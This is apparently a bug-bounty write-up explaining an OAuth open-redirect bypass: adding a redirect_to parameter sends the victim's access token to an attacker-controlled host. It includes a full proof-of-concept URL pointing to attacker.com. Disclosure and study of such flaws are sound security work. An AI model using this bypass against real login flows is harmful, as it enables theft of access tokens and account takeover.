Open Redirect to Account Takeover

Hi Everyone, this is a very first article from us. First of all, we would like to introduce ourselves. We are z3r0tru5t, a group of passionate hackers, bounty-hunters, researchers, writers, InfoSec enthusiasts, you name it. You may expect more articles, audio recordings, discussions from us in the future.

With that said, the following article is a write-up on open redirect vulnerability that leads to account takeover.

A target was identified — containing an open redirect URL parameter

redirect_uri=https://target.com

When changing target.com to an attacker controlled URL, it did not work. Not a surprise there. However, it was possible to bypass this. Let’s take a step back — this URL is an oAuth URL, and the following URL will be produced when navigating to the login page.

https://target.com/login?state=XXXXX&protocol=oauth2&response_type=token%20id_token&redirect_uri=https%3A%2F%2Ftarget.com%2F

Again, recall our previous statement, redirect_uri does not work,but appending &redirect_to worked like a charm!

Our PoC is the following:

https://target.com/login?state=XXXXX&protocol=oauth2&response_type=token%20id_token&redirect_uri=https%3A%2F%2Ftarget.com%2Fredirect_to=https://attacker.com

It does not end there. We noticed that upon successful login, the victim’s Access Token is being forwarded to the server hosting the “redirected_to” URI in the URL bar as shown in the following.

https://attacker.com/#<ACCESS_TOKEN>

With the access token, it is possible for us to request API calls on behalf of the resource owner. Of course, this attack would require the attacker to first launch a successful phishing attack (which wouldn’t be as difficult considering most common users don’t check for the full URL e.g. “redirect” parameters).

For additional information regarding oAuth: https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1